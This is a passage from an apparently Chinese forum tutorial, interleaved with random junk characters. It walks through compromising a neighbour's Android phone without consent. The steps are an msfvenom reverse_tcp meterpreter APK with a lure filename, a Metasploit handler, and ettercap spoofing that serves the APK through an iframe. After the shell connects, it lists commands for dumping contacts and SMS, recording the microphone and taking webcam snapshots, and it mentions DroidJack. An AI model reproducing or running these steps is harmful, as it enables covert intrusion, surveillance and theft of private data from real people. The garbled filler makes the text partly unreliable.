+ L# R5 @+ I) R& C% \7 S) t2 g 五、msf+ettercap入侵邻居安卓手机
" @5 n& l: q; l+ q
8 D1 ?2 w5 {0 F; D1 m$ p1 V
7 p" R: ^" D$ n 首先启动msf
+ o6 {, m$ ^) q( x- p! W* U
j1 o' d$ N7 E8 h' e1 `% b+ q* v6 }7 f" ^. Q3 e& k; ?% V" U
先用kali生成一个安卓木马,如下命令: t1 [4 D E: _! ~: G& B
: P) @, G6 R* ]& T! U8 \
' `3 T8 j7 m" \/ t J7 [! ]) Z Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
# F6 y4 [7 L0 G
1 z( k. F$ B8 ]
h. y8 t, v F y0 F) U# _ 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 % F% I, X8 P8 N1 j. Z
- G: E( A- M+ L- u3 G
- h+ t$ K, @$ Y( a, z. x$ ? 然后进入msf 4 G; ~* J- A$ L( F* y
6 X9 ]2 M" X. x. @1 E
; D' R" A! L0 N, [2 k use exploit/multi/handler / I/ M4 y; ^ c
1 n9 R6 R5 B7 v+ e
7 a: R; J' g4 F% P0 O set payload android/meterpreter/reverse_tcp
6 G0 D% ]- E$ D6 l : j \' u2 q r; |. m
. l2 A0 k$ K, a+ Q0 c: ~7 h6 Q set LHOST 192.168.0.109 //ip为kaili的ip a: i; L! j. G! L' w+ p% K
- u' p7 X3 Y/ J' Y' m$ \3 M
/ n i w: t c2 Z
set LPORT 44444 //端口一定要与前面生成的木马的端口一致
$ I& N) j! z" c/ @; ~$ r 5 ]9 O' [( j( b l v( P# |) E4 `
R5 t0 L# K! ?* }
Exploit
7 n0 V# I$ Z6 B 3 P4 O" r0 i' k0 g
1 Z- t* }: X* K4 Y" W M
1 W+ f' {/ s# ^/ D4 F' K
, ` M- [& S' S, E! n9 B
6 r% t+ v9 N$ g+ {/ w! Z) U 下面我们开启ettercap -G
; C1 b* s; ^. u1 t. r9 e @, ^, P 9 u* J( |; L- V, W* R+ t
l8 l, T# L" T! {+ {+ `! ]( k' ~ 我物理IP为
, r' K: q4 j2 d- j* Q2 X 0 }3 {) C. i( g$ Y% o% i
* c/ X a6 F+ {4 f' A0 b5 Q* C
# z& S; T. H" F ' j9 Y/ u8 j* {4 R/ f5 j9 b0 s- ]
. W! A6 B) Q I" R$ I
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, % N, q) z s) d6 t# {
+ u3 l$ G! H g( b6 U4 r
) c4 w8 w; |2 q' y0 Y- \
下面我们来设置一下 % l' D; h) H0 r; y1 Z
$ B* E3 D3 ?7 q# t/ P
* D8 B' A$ L, E; s. S/ g
* q9 m' n2 V9 V3 f6 Y4 _. D
3 _3 H6 a+ F7 d9 l1 s% t a+ n( v6 L
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
4 @7 X3 K3 I, c$ D" C/ q6 C 4 s$ x. _3 C2 H
5 p4 [1 L7 J; Y: r( y- L
- H* H/ I, k! b 5 Y0 Y2 @& v2 @4 \, L! o
4 ~% B7 v, k7 D+ B6 j
- z. \; `* l, G7 S2 w
9 G, g) L7 E9 S9 W: C S+ N
2 c& @: U2 n o8 K1 d # ^9 o3 P# z; z' g& a! f
7 z# s$ D$ t1 ^
* e P+ R5 i' T( K0 S& N. c
, f1 Z; f% H/ i5 ~ 8 D3 H7 W) W0 s* n
! U% J) e8 p1 ~4 y) y
( x& p3 r. E5 Z- q0 Y2 g( t: ~ l
7 C* c: F( n3 w
3 t! ?6 d; j' N. I 3 ~' g/ |" X( v( l9 d( ^3 g6 e D
) u8 @; j1 Y' h1 l w, z
- j. l% H) A. Q+ M . v$ m: }2 e" ]) Y9 o0 |
. Z$ Q; u! w( X5 ]" \. i
/ k5 T- L: t% D; T1 \& s
% `: B6 P4 p) a/ ? : z/ Q9 i* F9 c
: B# E! g" N6 ^2 {
. y3 }: `# c: n/ M5 X
: {8 K T# p* N6 u
3 L V1 v+ a0 { \2 u/ T; ^
* @" e$ x8 u8 H* j6 V. O & K- o2 O! A, _$ Z5 `- N( L: R
# h; S1 v+ U8 p) \" [6 t* k; r6 A" Y
; U+ t( n( ]5 U& u7 F, @9 L
7 |% r$ b3 ?& K. S& Z! ?/ J
* ^6 G: C1 ?+ ?. R0 A6 s j' a ! l( z$ s; P& G; n' ]
* ^1 e' T& ?# Z/ j& k& X5 a
: d. W! }$ \+ H. V1 [: l
a, R6 R$ x1 k( T) x
( D+ S1 A ]8 ~0 ], B1 q
& i& C3 W! F. l" |7 Y# y* U7 R
下面我们开始攻击 1 O% S& D& `9 X
. O# x) I8 d4 s/ L" ]+ G
. x2 g( s% g1 N- @- C4 K! L: B T8 `
4 o- _( T! A: [* A9 M! z2 A
% c u4 a. \' m; U3 g# |" H) W) L s) g
; p g) U& q8 s4 ^
4 K6 P& j: \! R- J
2 L4 F5 _7 n' D2 o; k. t- y% a! Z- G1 F7 M: Y
s6 O8 i( U: Z. j/ e
p# Z7 O) A! M% ~6 f( A+ I
! Y. ]& K& c# ~4 L) l
9 z% E( w) v( ?! K8 C2 }7 X
8 L1 |6 t7 r2 R8 m/ E
: W1 A0 y3 V* v$ O. v2 f # [* W3 u3 [! t+ ?9 C: H
4 [# a, h8 Q9 ?$ u* e
: r0 L+ W( M" W; ]
大概过了5分钟多,发现反弹成功了
) Y! X! B" V0 J6 J( y* E
8 D/ J( |4 d) M
( x1 n% p& \ ?5 k8 w ' M$ H/ I2 D/ K3 _$ T+ `
5 y4 Y$ v# X5 u/ U
, K0 ~. A' Q# q; a. u
; {6 c6 L( r1 G1 m4 v4 F
& ~/ }, S2 k, X4 K3 q' T; ~% J9 c! ^+ ^& Q$ [% M; k0 T
# \( M8 p+ w) n0 V" {% W% j
' g: F# n. g0 ~; Z ~
+ u2 G3 T5 J7 V! O% _
+ K; u, S0 `+ |3 [/ r
4 [3 `* G+ I: r) o) h# J
0 ]* `/ K4 C$ D4 B- `. e, Y+ N
# I4 _9 f( Z; S# B" J: v3 x : k1 E |; _6 C' U [
( K7 p, b: k8 T2 `2 f2 }
2 ]3 F3 l5 `: Z) K3 L% j
|+ e9 y6 q- u% T( L" Q/ Q* N2 _$ O% w$ F8 |8 k" L7 v, `
/ n+ u( S; ~$ W( _2 I0 Z
" I/ v, ?+ O8 p& z9 X* z" A: A. h* h7 b6 D5 @( B' ]2 f1 {- z9 B
执行命令 2 l d8 B7 }$ l
. ?8 O( }! g( K+ y5 N2 w1 L
, Q. u3 _ b, w+ M7 q% `# [
% r S4 ^# T: o- s
# Y7 V2 k- J& B/ \; f1 R
) i" o8 [5 n$ P7 y } dump_contacts --》这个是导出电话 - j2 B4 d) H4 E# T& j2 H1 s$ S
- H+ t+ W, a% a/ p" |" R
7 N2 p* y5 o" H6 A6 j, z
dump_sms --》这个是导出信息 & e/ m6 S. ?8 N# L. n4 M3 J: L
; X8 z" E9 M0 A% j4 r$ o; E/ `
record_mic Record audio from the default microphone for X seconds + ]5 L% n* y# X( l; {+ u
7 `: F/ s, N/ R. N; a. B4 U
5 |# P1 E. ?0 i+ {/ Y/ M webcam_chat Start a video chat # u- O: u+ J0 X4 p6 Y
/ q5 m* l7 t( x( d7 n
8 `* {% F" Y! ~/ c: c
webcam_list List webcams
; n9 Z! c$ ^5 N2 V
* K. p) m- ?1 G: G4 `0 v" i/ @; e3 |# O8 Y
webcam_snap Take a snapshot from the specified webcam
) A( v/ E. T. t; f9 B
9 e- ` K/ S6 f" }0 e3 |* e- J5 x9 ~8 P
webcam_stream   lay a video stream from the specified webcam
. J# m; y( b# i' q# {0 D
$ Z8 _3 K' C' V. _3 ]! y6 F, B1 W: F! B6 Q- J: b; A1 _
( N0 G# \/ M% L A+ v" [( U1 R
2 k1 i! O. S9 n: v! K
5 @$ C7 i% ^- J/ w/ v7 j! G# `- K% S - w( L( R# Y! l4 D
( U; y- J5 r, j) D! S4 C
1 o# w- y" h6 i! E6 V% R7 P; L 我们打开看一下电话薄,
6 i" y# o+ o' N 3 b7 e, G7 S1 ~) d& T
' k' g# W @2 q% r n; q 5 ?; }. V! g5 H5 T" [9 H3 j
+ R, B" S! k' Y8 z- a
5 s/ ^# ?4 J; W" H, _
. i* V& V, ]4 [ 3 g& j- p$ O. m! s2 C' |
/ }% C6 U$ J: `! N
1 e: S5 C1 ^+ y' I: ` k
: J% O* o# o Y* M& ?# [! _+ b. f% R
" |1 L/ ]* @0 O# L0 t8 L
& i; \! f# `7 c; C: W
Y# T4 [7 j C- m+ z( G- d, h7 h , g+ }% E) ~- `" ~2 }# _ h
* e. U6 u# K0 K9 \! r; L M
" P2 {/ j7 V9 N, f' c! Q- w ; L) @& g0 E5 y
r1 E7 T& C/ f6 v6 E, u6 U
0 j& q1 s& ^; _9 T8 U" O
我们同时欺骗成DroidJack木马,使用方法如图: % K! r0 y' x* E" F) x
3 ^ h% Y+ A0 Y% H5 u5 M8 J
" r& e2 `8 k; y3 q0 e. x2 } ! M# i+ b$ G1 d ~ k [5 j
+ b9 u% y1 d, B* ]; L. s7 V
7 l1 M+ w: D3 W+ m " K( h2 K4 _6 v
& w2 N1 C2 \8 c9 u- b+ A: O. r
: y2 g6 ~; J, ]2 d9 r7 ~, o ~
% e$ A# Z* k: d* W7 J' | / Q- c5 ? J+ k7 S! ~
; F4 e# l r$ q/ D 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 3 P6 g9 ~: J% p. w
, n# D' Z! Q- y1 x/ u% b
3 i4 \* l8 `: Y" ?- J& K6 m
$ M2 E# g9 n$ C3 ~$ W/ V
1 K j M- V3 {2 r# v# a* j$ g! b2 T% X0 ^8 u0 V
% T$ ~/ w8 S7 X
8 m y2 s) v0 A& n; v
3 X. F0 F3 d1 i r
+ {9 b. a5 Y4 x$ \' _
" \ G: G p- F3 d' n" |" j% \5 n h# | i Q( A% U

' l2 c3 E0 I. X3 x ; W+ @6 r$ @* h/ R- `
5 l" k6 }0 a3 h( p; h$ z
( ]4 u, |# c# R7 k1 v
|